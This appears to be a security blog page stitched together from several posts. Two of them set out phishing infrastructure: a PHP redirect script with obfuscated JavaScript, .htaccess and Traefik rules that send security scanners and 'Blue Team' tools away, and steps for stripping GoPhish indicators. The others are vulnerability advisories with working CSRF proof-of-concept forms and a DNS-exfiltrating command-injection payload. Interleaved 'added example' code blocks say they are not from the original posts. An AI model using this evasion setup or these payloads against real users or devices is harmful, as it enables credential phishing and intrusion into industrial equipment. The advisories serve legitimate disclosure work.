Phishing: Bypassing Protections with Dynamic Obfuscated JavaScript, PHP, and .htaccess

Introduction

In this post, we detail a PHP script designed to dynamically generate JavaScript code for redirecting users while bypassing some email protections. We also explore the advanced use of Apache’s .htaccess files to manage web traffic during a phishing campaign.

The GoPhish IOCs were removed, and the default rid value was replaced with ogt. You can find more info in Phishing Campaigns: Simulating Real Adversary Tactics.

PHP Code for Dynamic Redirection

Below is the code for redirect.php, which validates a token (ogt), performs necessary checks, and generates dynamic JavaScript that redirects users to a login portal.

<?php
// redirect.php
// Validate the token: exactly 7 alphanumeric characters, otherwise stop here.
// The strict character class is also what makes it safe to echo the token into
// the JavaScript string and the href below.
if (!isset($_GET['ogt']) || !preg_match('/^[a-zA-Z0-9]{7}$/', $_GET['ogt'])) {
    die('Invalid token.');
}

$token = $_GET['ogt'];

// Generate a random variable name to obfuscate the JS code.
// Prefix it with a letter: md5() output can start with a digit, and a JavaScript
// identifier that starts with a digit is a syntax error, which would break the redirect.
$randomVar = 'v' . substr(md5((string) rand()), 0, 8);
$redirectUrl = "https://login.acme-lab.com/?ogt=" . $token;

// Set HTML content header
header('Content-Type: text/html; charset=utf-8');
?>
<!DOCTYPE html>
<html>
<head>
    <meta charset="utf-8">
    <title>Redirecting...</title>
    <script type="text/javascript">
        (function(){
            // Random variable to avoid fixed patterns in the code
            var <?php echo $randomVar; ?> = '<?php echo $redirectUrl; ?>';
            // Dynamic redirection to the login URL
            window.location.href = <?php echo $randomVar; ?>;
        })();
    </script>
</head>
<body>
    <noscript>
        If you are not redirected automatically, click <a href="<?php echo htmlspecialchars($redirectUrl, ENT_QUOTES, 'UTF-8'); ?>">here</a>.
    </noscript>
</body>
</html>

Technical Explanation

  1. Token Validation:
    The script checks if the ogt parameter exists and conforms to the expected pattern (7 alphanumeric characters). If not, the script exits.

  2. Random Variable Generation:
    A random variable name is generated to hold the redirection URL, which obfuscates the JavaScript code and makes it harder for automated tools to detect a fixed pattern.

  3. Dynamic JavaScript Generation:
    The PHP script outputs HTML that includes a JavaScript snippet. This snippet creates the randomly named variable and immediately redirects the browser to the generated URL. A <noscript> tag is included for users with disabled JavaScript.

Web Traffic Flow and .htaccess Configuration

This section outlines a controlled web traffic flow using Apache rewrite rules and .htaccess configurations. Below is a detailed explanation of the configurations.

Traffic Flow

  1. User Entry:
    The user receives a link structured as follows:
    https://lading.acme-lab.com/?ogt=3XdwYUe

    • lading.acme-lab.com: The domain that receives the request.
    • ogt=3XdwYUe: The per-recipient token (GoPhish's rid parameter, renamed) used for tracking.

  2. Internal Redirection:
    The server internally rewrites the request (no HTTP redirect is sent) to:
    https://lading.acme-lab.com/redirect.php?ogt=3XdwYUe

    where the PHP script (shown above) dynamically generates the JavaScript for redirection.

  3. Final Destination:
    Ultimately, the user is redirected to:
    https://login.acme-lab.com/?ogt=3XdwYUe

    which hosts the cloned captive portal for the campaign.

  4. Infrastructure Setup:
    • GoPhish Deployment: GoPhish is hosted on an internal server that is not directly accessible from the internet.
    • Reverse SSH Proxy: The domain login.acme-lab.com acts as a proxy that forwards traffic to the internal GoPhish instance using reverse SSH tunneling. This allows external users to interact with GoPhish’s phishing portal without exposing it directly.
    • Port Forwarding: The reverse SSH connection binds the internal GoPhish service running on port 8080 to the external-facing proxy.

.htaccess Configurations

Two .htaccess files were used: one on the landing domain (lading.acme-lab.com) and one on the Apache host that fronts GoPhish (login.acme-lab.com). Rule order matters in both. The first rule lets Gmail's image proxy, which fetches the tracking pixel on behalf of the recipient, reach GoPhish's /track endpoint even though "google" is otherwise treated as a bot user-agent and bounced to Okta. Below, we detail each configuration.

.htaccess hosted on lading.acme-lab.com

RewriteEngine On

# 1. Check if the request is for /track
# 2. Check if the query string contains a well-formed ogt parameter
# 3. Check if the user-agent is GoogleImageProxy (Gmail fetching the tracking pixel)
# If all 3 conditions are met, redirect to https://login.acme-lab.com/track?%{QUERY_STRING}
# This rule must stay first: "google" also appears in the bot list below.
RewriteCond %{REQUEST_URI} ^/track$ [NC]
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&) [NC]
RewriteCond %{HTTP_USER_AGENT} via\ ggpht\.com\ GoogleImageProxy [NC]
RewriteRule ^ https://login.acme-lab.com/track?%{QUERY_STRING} [R=302,L]

# Redirect known tools, crawlers, security products and empty user-agents to Okta
# (the trailing "?" discards the query string, so the token is not carried into the redirect)
RewriteCond %{HTTP_USER_AGENT} "WebZIP|wget|curl|HTTrack|crawl|google|bot|b\-o\-t|spider|baidu|python|scrapy|postman|semrush|avast|Norton|Kaspersky|MSIE|trident" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ https://acme-labo.okta.com? [R=302,L]

# If the URI is exactly /redirect.php, stop processing here. The internal rewrite
# below sends the request back through this file, so it must not be matched again.
RewriteCond %{REQUEST_URI} ^/redirect\.php$ [NC]
RewriteRule ^ - [L]

# Likewise, serve /favicon.ico as-is and stop processing.
RewriteCond %{REQUEST_URI} ^/favicon\.ico$ [NC]
RewriteRule ^ - [L]

# Internally rewrite (no 302) requests with a well-formed ogt parameter to redirect.php,
# keeping ALL query parameters (QSA)
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&)
RewriteRule ^ /redirect.php [L,QSA]

# Redirect all other requests to Okta without parameters (trailing "?" drops the query string)
RewriteRule ^.*$ https://acme-labo.okta.com? [R=302,L]

.htaccess hosted on login.acme-lab.com (the Apache host in front of GoPhish) for extra evasion

RewriteEngine On
# The [P] flag below requires mod_proxy and mod_proxy_http to be loaded on this host.

# For GoPhish tracking: the same first rule as on the landing domain, proxied to the
# GoPhish port bound by the reverse SSH tunnel (the query string is passed through by default)
RewriteCond %{REQUEST_URI} ^/track$ [NC]
RewriteCond %{QUERY_STRING} (^|&)ogt=([a-zA-Z0-9]{7})($|&) [NC]
RewriteCond %{HTTP_USER_AGENT} via\ ggpht\.com\ GoogleImageProxy [NC]
RewriteRule ^.*$ http://localhost:8080%{REQUEST_URI} [P,L]

# Avoiding the Blue Team: tools, crawlers and empty user-agents go to Okta
RewriteCond %{HTTP_USER_AGENT} "wget|curl|HTTrack|crawl|google|bot|b\-o\-t|spider|baidu" [NC,OR]
RewriteCond %{HTTP_USER_AGENT} =""
RewriteRule ^.*$ https://acme-labo.okta.com? [L,R=302]

# For GoPhish: proxy when ogt is present AND (js_executed=1 OR js_executed is absent).
# Consecutive [OR] conditions form one group, which is ANDed with the ogt condition.
RewriteCond %{QUERY_STRING} ogt=(.+)
RewriteCond %{QUERY_STRING} js_executed=1 [OR]
RewriteCond %{QUERY_STRING} !js_executed=
RewriteRule ^.*$ http://localhost:8080%{REQUEST_URI} [P,L]

# Others
RewriteRule ^.*$ https://acme-labo.okta.com? [L,R=302]
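To check that the two rule sets actually do what their comments claim, the following JavaScript models their decision logic and runs constructed requests through it. This is an added example, not part of the original post or of the campaign tooling: the regular expressions and hosts are copied from the two .htaccess files above, the sample user-agent strings and requests are constructed, and the same bot filter is reused by the Traefik router rule in the Phishing Campaigns post further down this page, so the model covers that rule too.

```javascript
// Added example: a model of the two .htaccess rule sets above (not part of the post).
// Regexes and hosts are copied from the configs; the requests at the bottom are constructed.

const OKTA = 'https://acme-labo.okta.com';
const TOKEN_RE = /(^|&)ogt=([a-zA-Z0-9]{7})($|&)/;            // well-formed GoPhish token (renamed rid)
const IMAGE_PROXY_RE = /via ggpht\.com GoogleImageProxy/i;   // Gmail fetching the tracking pixel
const LANDING_BOT_RE = /WebZIP|wget|curl|HTTrack|crawl|google|bot|b-o-t|spider|baidu|python|scrapy|postman|semrush|avast|Norton|Kaspersky|MSIE|trident/i;
const PROXY_BOT_RE = /wget|curl|HTTrack|crawl|google|bot|b-o-t|spider|baidu/i;

// .htaccess on lading.acme-lab.com, rules in file order. Returns the decision for one pass.
function routeLanding(req) {
  const { path, query = '', userAgent = '' } = req;

  // Rule 1 comes first: the pixel fetched via Gmail's image proxy must reach GoPhish's
  // /track even though "google" is in the bot list evaluated next.
  if (/^\/track$/i.test(path) && TOKEN_RE.test(query) && IMAGE_PROXY_RE.test(userAgent)) {
    return { action: 'redirect', status: 302, target: `https://login.acme-lab.com/track?${query}` };
  }
  // Rule 2: tools, crawlers, security products and empty user-agents are bounced to Okta.
  if (LANDING_BOT_RE.test(userAgent) || userAgent === '') {
    return { action: 'redirect', status: 302, target: OKTA };
  }
  // Rules 3 and 4: "RewriteRule ^ - [L]" serves /redirect.php and /favicon.ico untouched.
  if (/^\/redirect\.php$/i.test(path) || /^\/favicon\.ico$/i.test(path)) {
    return { action: 'serve', path, query };
  }
  // Rule 5: a well-formed token is rewritten internally (no 302) to redirect.php; QSA keeps the query.
  if (TOKEN_RE.test(query)) {
    return { action: 'rewrite', path: '/redirect.php', query };
  }
  // Rule 6: everything else.
  return { action: 'redirect', status: 302, target: OKTA };
}

// Per-directory rewrites are re-applied to the rewritten URI, so follow internal
// rewrites until the request is served or redirected (bounded, like Apache's recursion limit).
function resolveLanding(req) {
  let current = req;
  for (let pass = 0; pass < 10; pass++) {
    const decision = routeLanding(current);
    if (decision.action !== 'rewrite') return decision;
    current = { ...current, path: decision.path, query: decision.query };
  }
  throw new Error('rewrite loop');
}

// .htaccess on login.acme-lab.com, in front of the reverse-SSH-bound GoPhish port.
function routeProxy(req) {
  const { path, query = '', userAgent = '' } = req;
  const upstream = `http://localhost:8080${path}${query ? '?' + query : ''}`;

  if (/^\/track$/i.test(path) && TOKEN_RE.test(query) && IMAGE_PROXY_RE.test(userAgent)) {
    return { action: 'proxy', target: upstream };
  }
  if (PROXY_BOT_RE.test(userAgent) || userAgent === '') {
    return { action: 'redirect', status: 302, target: OKTA };
  }
  // ogt present AND (js_executed=1 OR js_executed absent): consecutive [OR] conditions
  // form one group that is ANDed with the ogt condition before them.
  const hasToken = /ogt=(.+)/.test(query);
  const jsExecuted = /js_executed=1/.test(query) || !/js_executed=/.test(query);
  if (hasToken && jsExecuted) {
    return { action: 'proxy', target: upstream };
  }
  return { action: 'redirect', status: 302, target: OKTA };
}

// Constructed sample requests (user-agent strings are illustrative).
const IMAGE_PROXY_UA = 'Mozilla/5.0 (Windows NT 5.1; rv:11.0) Gecko Firefox/11.0 (via ggpht.com GoogleImageProxy)';
const BROWSER_UA = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36';

const SAMPLES = [
  { who: 'Gmail pixel fetch',     path: '/track', query: 'ogt=3XdwYUe',               userAgent: IMAGE_PROXY_UA },
  { who: 'Google UA, not /track', path: '/',      query: 'ogt=3XdwYUe',               userAgent: IMAGE_PROXY_UA },
  { who: 'curl',                  path: '/',      query: 'ogt=3XdwYUe',               userAgent: 'curl/8.4.0' },
  { who: 'empty UA',              path: '/',      query: 'ogt=3XdwYUe',               userAgent: '' },
  { who: 'victim, good token',    path: '/',      query: 'ogt=3XdwYUe',               userAgent: BROWSER_UA },
  { who: 'victim, 6-char token',  path: '/',      query: 'ogt=3XdwYU',                userAgent: BROWSER_UA },
  { who: 'victim, JS flag off',   path: '/',      query: 'ogt=3XdwYUe&js_executed=0', userAgent: BROWSER_UA },
];

for (const s of SAMPLES) {
  console.log(s.who.padEnd(22), 'landing:', JSON.stringify(resolveLanding(s)), ' proxy:', JSON.stringify(routeProxy(s)));
}
```

Two things the model makes visible that the configs only imply: the image-proxy user-agent contains "google", so it is only admitted on /track because that rule runs first, and a token one character short is not a bot but still never reaches redirect.php.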

Conclusion

In this post, we showcased how a PHP script can dynamically generate JavaScript for user redirection within a phishing campaign, complemented by advanced .htaccess rules for traffic management. By combining server-side validation with client-side dynamic redirection and leveraging Apache’s rewrite capabilities, it is possible to bypass common email protections and maintain tight control over the traffic flow.

This infrastructure setup allows GoPhish to remain internal while still serving external users through a reverse SSH proxy, reducing exposure and making detection more challenging.

CVE-2024-4600 and CVE-2024-4601. Security Vulnerabilities Found in Socomec NET VISION UPS Network Adapter

Net Vision is a communication interface designed for enterprise networks that enables a direct and secure connection between the UPS and the Ethernet network. This connection provides a wide range of network services, including UPS monitoring, event notifications, automatic shutdown of UPS-powered servers, and many other services. Net Vision also functions as an IoT gateway, granting access to a variety of digital services. It is compatible with all UPS models equipped with a communication slot.

Power management in critical infrastructure requires reliable monitoring and control capabilities. Socomec, a company specializing in low-voltage electrical equipment, offers NET VISION - a professional network adapter designed for remote UPS monitoring and control. This adapter enables direct UPS connection to IPv4/IPv6 networks, allowing remote management through web browsers, TELNET interfaces, or SNMP-based Network Management Systems (NMS).

During a security assessment at IOActive, I evaluated version 7.20 of the NET VISION adapter and discovered several security issues that could potentially impact organizations using these devices for UPS management. These findings highlight the ongoing challenges in securing industrial monitoring equipment.

CSRF Vulnerability in Password Change Functionality (CVE-2024-4600)

Description

The first vulnerability, rated as MEDIUM severity, involves a Cross-Site Request Forgery (CSRF) weakness in the password change mechanism. The web interface lacks proper CSRF protections, allowing an attacker to trick authenticated administrators into unknowingly changing their passwords.

What makes this vulnerability particularly concerning is that the password change functionality doesn’t require the current password for verification, making the attack easier to execute.

Proof of Concept

The vulnerability can be exploited using this simple HTML form:

<html>
<body>
<script>history.pushState('', '', '/')</script>
<!-- enctype="text/plain" sends the field unencoded, so the "&" and "=" inside the
     name and value are parsed by the server as separators between three parameters -->
<form action="https://[DEVICE-IP]/cgi/set_param.cgi" method="POST" enctype="text/plain">
<input type="hidden" name="xml&amp;user&#46;su&#46;passCheck&#91;0&#93;" value="IOActive1234&amp;user&#46;su&#46;passCheck&#91;1&#93;&#61;IOActive1234" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

When an authenticated administrator visits a page containing this code, their password would be changed to “IOActive1234” without their knowledge or consent.
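Why the enctype="text/plain" trick works, as an added JavaScript example that is not from the advisory: the first function encodes the form the way a browser does, the second parses the result the way a CGI that ignores the Content-Type and splits on & and = would, and the third is the detection-side check a reverse proxy or WAF could apply. The field name and value are the PoC's, decoded from their HTML entities; no endpoint is contacted.

```javascript
// Added example (not from the IOActive advisory): what the browser sends for the
// enctype="text/plain" form above, and why a naive CGI reads it as three parameters.

// A browser encodes a text/plain form as one "name=value" line per field, CRLF-terminated,
// with no percent-encoding. That is the whole trick: "&" and "=" survive inside a value.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join('');
}

// The PoC's single hidden input, with its HTML entities decoded (&#46; -> ".", &#91; -> "[", ...).
const POC_FIELDS = [
  ['xml&user.su.passCheck[0]', 'IOActive1234&user.su.passCheck[1]=IOActive1234'],
];

function buildPocBody() {
  return encodeTextPlainForm(POC_FIELDS);
}

// A parser that ignores Content-Type and splits on "&" and "=" (what the affected CGI
// evidently does, since the password change succeeded) sees the body as form data.
// The trailing CRLF is trimmed, as a tolerant parser would.
function parseAsUrlEncoded(body) {
  return Object.fromEntries(new URLSearchParams(body.replace(/\r\n$/, '')).entries());
}

// Defensive counterpart: a text/plain POST whose body contains two "key=value" pairs
// joined by "&" is a strong CSRF indicator worth rejecting (or alerting on) before parsing.
function looksLikeSmuggledForm(contentType, body) {
  const type = (contentType || '').split(';')[0].trim().toLowerCase();
  return type === 'text/plain' && /[^&=\r\n]+=[^&\r\n]*&[^&=\r\n]+=/.test(body);
}

const body = buildPocBody();
console.log('wire body      :', JSON.stringify(body));
console.log('server sees    :', parseAsUrlEncoded(body));
console.log('smuggled form? :', looksLikeSmuggledForm('text/plain', body));
```

The parsed result has passCheck[0] and passCheck[1] both set to IOActive1234, which is exactly what a password-confirmation field pair expects. A server that only accepts application/x-www-form-urlencoded for this endpoint, or that binds the change to a CSRF token, is not fooled by the encoding.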

Impact

An attacker could:

  • Change administrator passwords without knowing the current password
  • Lock legitimate administrators out of their systems
  • Gain unauthorized access to UPS management functions
  • Potentially disrupt power management operations

Weak Session Management (CVE-2024-4601)

Description

The second vulnerability, rated as LOW severity, relates to a weak session management implementation. The application uses a small integer (at most six digits, drawn from getRandomInt(1,1000000)) as the session token, which is cryptographically insufficient for secure session management.

The session token is generated using this JavaScript code in /super_user.js:

function runScript(e) {
    if (e.keyCode == 13) {                          // Enter key submits the login form
        var hashkey2 = Base64.encode($("#login-box #password").val());   // password is only Base64-encoded, not hashed
        var tmpToken = getRandomInt(1,1000000);     // "session token": a number below 1,000,000, chosen in the browser
        Set_Cookie("user_name",$("#login-box #username").val());
        Set_Cookie("tmpToken", tmpToken);           // the client sets its own session cookie
        document.getElementById("token").value = tmpToken;
        // ... rest of the handler not reproduced in the advisory
    }
}

Impact

This implementation is vulnerable because:

  • The session token space is too small (fewer than 1,000,000 possible values, under 20 bits of entropy)
  • Tokens are predictable due to the simple random number generation (getRandomInt is not a cryptographically secure source)
  • The token is generated in the browser and submitted with the login form rather than issued by the server, so the client picks its own session identifier
  • An attacker could brute force valid session tokens
  • The implementation lacks many security best practices for session management

Timeline and Resolution

  • September 29, 2022: Vulnerabilities discovered
  • June 28, 2023: Vulnerabilities reported to Socomec
  • November 21, 2023: Socomec confirmed fixes in new NET VISION card (version 8)
  • January 9, 2024: Vulnerabilities reported to INCIBE (Spanish CERT)
  • March 5, 2024: Advisory published

Recommendations

For organizations using NET VISION adapters:

  1. Upgrade to NET VISION version 8 or later as soon as possible
  2. Implement network segmentation to isolate UPS management interfaces
  3. Use VPNs or similar secure access methods for remote management
  4. Regularly monitor for unauthorized access attempts
  5. Implement proper access controls at the network level

For manufacturers implementing web interfaces:

  1. Implement proper CSRF protection using tokens
  2. Require current password verification for password changes
  3. Use cryptographically secure session management
  4. Follow OWASP session management best practices
  5. Implement proper security controls from the design phase

Conclusion

These vulnerabilities in the NET VISION adapter demonstrate common web security issues that continue to appear in industrial equipment. While the individual vulnerabilities might not seem critical in isolation, their combination could allow attackers to compromise UPS management systems, potentially affecting critical infrastructure availability.

Find all the details of this advisory on IOActive’s Blog

CVE-2024-2740, CVE-2024-2741, and CVE-2024-2742. Critical Vulnerabilities Discovered in PLANET IGS-4215-16T2S Industrial Switches

Designed to be installed in heavy industrial demanding environments, the IGS-4215-16T2S / IGS-4215-16T2S-U is the new member of PLANET Industrial-grade, DIN-rail type L2/L4 Managed Gigabit Switch family to improve the availability of critical business applications. It provides IPv6/IPv4 dual stack management and built-in L2/L4 Gigabit switching engine along with 16 10/100/1000BASE-T ports, and 2 extra 100/1000BASE-X SFP fiber slots for data and video uplink. The IGS-4215-16T2S / IGS-4215-16T2S-U is able to operate reliably, stably and quietly in any hardened environment without affecting its performance. It comes with operating temperature ranging from -40 to 75 degrees C in a rugged IP30 metal housing.

Industrial networking equipment plays a crucial role in modern infrastructure, connecting and controlling critical systems across manufacturing plants, energy facilities, and smart city deployments. The PLANET IGS-4215-16T2S is a managed industrial switch designed for these demanding environments, featuring 16 10/100/1000T ports and 2 100/1000X SFP ports, making it a popular choice for industrial applications requiring reliable Ethernet connectivity.

During a recent security assessment at IOActive, I had the opportunity to analyze this device from a security perspective. The IGS-4215-16T2S comes with features like VLAN support, Quality of Service (QoS), and various management interfaces, including a web-based administration panel. However, our investigation revealed several concerning security vulnerabilities that could potentially compromise not just the device itself, but the entire industrial network it’s connected to.

Unauthenticated Access to Backup Files (CVE-2024-2740)

Description

The first and most critical vulnerability discovered carries a HIGH severity rating. While the device’s administrative web interface requires authentication for most operations, we found that the session verification mechanism failed to protect several critical system resources.

The device stores various configuration and backup files in predictable paths within the /tmp/ directory, including:

  • /tmp/ram.log
  • /tmp/running-config.cfg
  • /tmp/backup-config.cfg

What makes this particularly concerning is that these files contain sensitive information, including device credentials, and can be accessed without any authentication.

Impact

An unauthenticated attacker could:

  • Access complete device configurations
  • Extract stored usernames and passwords
  • Potentially compromise the entire industrial network
  • Gain persistent access to the device and its management features

CSRF in Administrative User Creation (CVE-2024-2741)

Description

The second vulnerability, rated as MEDIUM severity, enables Cross-Site Request Forgery (CSRF) attacks that could lead to unauthorized creation of administrative users without the legitimate administrator’s knowledge.

The issue stems from several security oversights:

  1. No CSRF tokens implementation to protect sensitive actions
  2. Acceptance of GET requests for operations that should be POST-only
  3. Lack of re-authentication requirements for critical actions like user creation

Proof of Concept

The vulnerability can be exploited using a simple HTML form:

<!-- No method attribute, so the browser submits this as a GET request, which the dispatcher accepts -->
<form action="https://[DEVICE-IP]/cgi-bin/dispatcher.cgi">
    <input type="hidden" name="usrName" value="test" />
    <input type="hidden" name="usrPassType" value="1" />
    <input type="hidden" name="usrPass" value="ioactive" />
    <input type="hidden" name="usrPass2" value="ioactive" />
    <input type="hidden" name="usrPrivType" value="15" />
    <input type="hidden" name="cmd" value="525" />
    <input type="submit" value="Submit request" />
</form>

Impact

An attacker could:

  • Create new administrative users without authorization
  • Gain persistent access to the device
  • Execute malicious actions appearing as legitimate user activity
  • Maintain long-term unauthorized access even after the initial compromise is detected

Authenticated Remote Code Execution (CVE-2024-2742)

Description

The third vulnerability discovered, rated as LOW severity, affects the Ping Test functionality located in the device’s diagnostic tools (Maintenance -> Diagnostic -> Ping Test -> IP Address). The issue stems from inadequate input sanitization in the ping test function, which could allow an authenticated attacker to execute arbitrary commands on the device.

Proof of Concept

The vulnerability can be exploited by injecting commands into the ping test functionality. For demonstration purposes, we used DNS requests to exfiltrate sensitive system information:

;ping `uname`.subdomain.com

When this payload is entered into the Ping Test functionality, the device:

  1. Executes the uname command
  2. Uses the output as part of a domain name
  3. Attempts to ping the resulting domain name

This resulted in DNS queries being made to domains like:

  • Linux.zoraoperl8y4x71u2jb3rbopjgp6dv.oastify.com
  • root.zoraoperl8y4x71u2jb3rbopjgp6dv.oastify.com

These DNS queries confirmed that:

  • The system is running Linux
  • The web application is running with root privileges

Impact

An authenticated attacker could:

  • Execute arbitrary commands on the device
  • Gather sensitive system information
  • Potentially compromise the entire device
  • Use the device as a pivot point for further network attacks

Timeline and Resolution

The vulnerability was discovered on September 29, 2022, and reported to PLANET Technology on March 29, 2023. The manufacturer released a firmware update (version 1.305b231218) on December 13, 2023, that addresses these vulnerabilities.

Recommendations

For network administrators using these devices, we recommend:

  1. Immediately upgrade to the latest available firmware
  2. Implement network segmentation to isolate these devices
  3. Actively monitor access to this equipment
  4. Consider implementing additional security controls at the network level

Conclusion

These vulnerabilities highlight the ongoing challenges in industrial device security. Basic security controls like session verification and CSRF protection should be standard features in any networked device, especially those deployed in critical industrial environments.

This research underscores the importance of regular security assessments for industrial network equipment, as even seemingly basic vulnerabilities can have significant implications for operational technology environments.

Find all the details of this advisory on IOActive’s Blog

Phishing Campaigns: Simulating Real Adversary Tactics

Nowadays, one of the most dangerous and effective attack vectors is the phishing campaign. From an offensive perspective, there are several differences between a whaling campaign and a mass phishing campaign; there are, however, several common points that should be covered in both cases.

As security professionals, one of our goals is to help improve security in the industry. To achieve this, annual phishing campaigns work well to enhance the detection and reporting rates of entities and companies.

This post will cover several phases of these engagements and provide some details on how we work to achieve our goals.

Infrastructure

Starting with a Red Team infrastructure model, a team server and redirectors are used. Redirectors play a crucial role in Red Team engagements: they conceal the actual IP addresses and route traffic through intermediate points before it reaches the target network. This obfuscation enhances the red team's stealth during attacks, making it more challenging for defenders to detect and respond to their activities. Redirectors are also essential for protecting the client information held on the team server, which is hosted in the company's internal network.

The team server serves as a centralized command center that communicates with compromised systems or “agents” deployed on target networks. In the context of a phishing campaign, the team server is employed to run the applications and tools necessary for conducting the engagement.

To achieve this, we will be utilizing Traefik as a redirector. Traefik will handle SSL certificates and help route traffic securely. Additionally, GoPhish will be used to send emails and manage the campaign effectively. To establish seamless and secure connections between the elements, we will use Headscale, which is a self-hosted alternative compatible with Tailscale. This combination of tools ensures that data is protected, and the engagement is conducted with utmost safety and confidentiality in mind.

Redirector

As a redirector, a Linux host in the cloud was utilized. There are various trusted platforms available for this purpose, and the choice depends on individual preferences and requirements.

To run Traefik, Docker needs to be installed, as it serves as the containerization platform for Traefik. According to its website, Traefik is an open-source Edge Router that simplifies the process of publishing your services: it receives requests on behalf of your system and determines which components are responsible for handling them. Developed in Go, Traefik is known for being lightweight and faster than other commonly used options like Apache and Nginx.

Although we will not go over the configuration files in detail, in this case Traefik used two of them: traefik.toml, where the server configuration, such as ports or log paths, is stored, and traefik_dynamic.toml, which is referenced from traefik.toml and is responsible for the SSL configuration and the behaviour of the redirector.

By leveraging Docker and these configuration files, Traefik provides a user-friendly experience for managing and routing your services efficiently.

Additionally, Traefik has built-in capabilities to handle SSL certificates. However, for our setup, we will generate the SSL certificates with certbot. The main goal of this post is to learn how to deploy a full phishing infrastructure; to reduce the detection rate, a real engagement should not use certbot, because Let's Encrypt publishes every certificate it issues in Certificate Transparency logs, which defenders monitor for lookalike domains. A self-signed SSL certificate in combination with Cloudflare is a better option.

To ensure that all the necessary software is installed on the host, we have created a convenient script called redirector.sh. This script will install certbot, Docker, Tailscale, and any other software required to set up our redirector correctly.

The SSL certificates generated with certbot will be stored in the cert/ folder, while all the log files will be found in log/. Additionally, the systemd/ folder stores the files required to run Traefik as a service on the host.

dan1t0@cybertron:~/dinam1t0$ ls -1
cert/
log/
redirector.sh
systemd
traefik.sh
traefik.toml
traefik_dynamic.toml

traefik.sh builds the configuration of the redirector if it has not been run previously.

dan1t0@cybertron:~/dinam1t0$ sudo ./traefik.sh build hack.attacker.com
- Generating SSL certs with certbot...
  -> Checking IPs
  -> Local IP: X.X.X.X (hidden)
  -> hack.attacker.com points to X.X.X.X (hidden)
certbot command -> certbot certonly --standalone -d hack.attacker.com --staple-ocsp --agree-tos --register-unsafely-without-email

- SSL certificates generated correctly
- Certificates found
- Running docker containers
  -> Cleaning previous version
     docker rm -f traefik
  -> Deploying docker
docker run -d -v /var/run/docker.sock:/var/run/docker.sock -v /home/dan1t0/dinam1t0/log:/log -v /home/dan1t0/dinam1t0/cert:/cert -v /home/dan1t0/dinam1t0/traefik.toml:/traefik.toml -v /home/dan1t0/dinam1t0/traefik_dynamic.toml:/traefik_dynamic.toml -p 80:80 -p 443:443 --name traefik --hostname traefik traefik:v2.10
traefik
fbc5ed8f95e4ac284ce0a8f4e9749946d7b22531646993f50b86a280fabdbff5

dan1t0@cybertron:~/dinam1t0$ sudo docker ps
CONTAINER ID   IMAGE           COMMAND                  CREATED         STATUS         PORTS                                                                      NAMES
fbc5ed8f95e4   traefik:v2.10   "/entrypoint.sh trae…"   9 seconds ago   Up 6 seconds   0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp   traefik

While the script can be executed with just one domain name, it also accepts multiple domain names as input.

Although this blog post is not a tutorial on how Traefik works, we will focus on two of the most crucial aspects of the configuration in traefik_dynamic.toml:

[http.routers.gophish]
  rule = "Host(`hack.attacker.com`) && Query(`ogt=`) && !HeadersRegexp(`User-Agent`, `(?i:wget|curl|HTTrack|crawl|google|bot|b-o-t|spider|baidu)`)"
  entrypoints = ["websecure"] # ["web"]
  service = "gophish"
  priority = 30
  [http.routers.gophish.tls]

[http.services.gophish]
  [http.services.gophish.loadBalancer]
    [[http.services.gophish.loadBalancer.servers]]
      url = "http://gophish:8080/"

[http.routers.gophish] is the section of the configuration where the redirector rules are defined. Within this section, the various matchers supported by Traefik can be combined: here the router only accepts requests for the campaign host that carry the ogt query parameter and whose User-Agent does not match the bot list. The meaning of the ogt string is explained below.

Filtering traffic by the User-Agent header is an important counter-measure in a phishing campaign: it lets the red team detect, and potentially block or limit, Blue Team activity. The User-Agent header is part of the HTTP request sent by web browsers, applications, or automated scripts when they communicate with a web server, and it identifies the client, such as the type of browser or application and its version. Besides Blue Team tooling, it is recommended to include the user-agents of crawlers and bots so the infrastructure is not flagged easily.

[http.services.gophish] sets the internal destination to which requests that meet our requirements are sent. In our case, they go to http://gophish:8080/, where our GoPhish instance is running internally. The gophish hostname is assigned during the Tailscale configuration process.

GoPhish

GoPhish is a well-known tool for conducting phishing campaigns. However, it is recommended to make some modifications to the original source to remove IOCs.

These IOCs are potential signs of a security breach or malicious activity that could be used by defenders or security tools to detect and respond to phishing attempts.

By removing IOCs from the source code, the phishing campaigns become more challenging for defenders to detect, allowing the red team to maintain a higher level of stealth and effectiveness during engagements.

A good starting point to remove the GoPhish IOCs is Sneaky GoPhish where the following lines are modified:

# Stripping X-Gophish 
sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request_test.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/maillog_test.go
sed -i 's/X-Gophish-Contact/X-Contact/g' models/email_request.go

# Stripping X-Gophish-Signature
sed -i 's/X-Gophish-Signature/X-Signature/g' webhook/webhook.go

# Changing servername
sed -i 's/const ServerName = "gophish"/const ServerName = "IGNORE"/' config/config.go

# Changing rid value
sed -i 's/const RecipientParameter = "rid"/const RecipientParameter = "ogt"/g' models/campaign.go

The parameter rid is appended to the URL of the link sent to the targeted user. In the previous example, it was renamed to ogt.

The same string is used in the redirector's Traefik configuration. As a result, the URL of the cloned portal and of the tracking pixel sent to the target takes the form http://hack.attacker.com/?ogt={randomToken}.

Once the changes are made, gophish source code is ready to be built by executing go build.

To boost our phishing infrastructure, we can monitor Gophish using additional scripts running in our internal server. These scripts will enable us to receive real-time alerts every time a user submits their credentials. We can achieve this by leveraging tools like Pushover, which will provide instant notifications.

Another effective strategy is to send through Sendinblue or Mailgun over SMTP, or to explore other alternatives, to get our emails delivered promptly and save time that we can use to improve our ruses.

In the future, we will share some Gophish tricks to further enhance the efficiency and effectiveness of our campaigns.

Reviving My Early Days and Looking Ahead -> [THE BEGINNINGS]

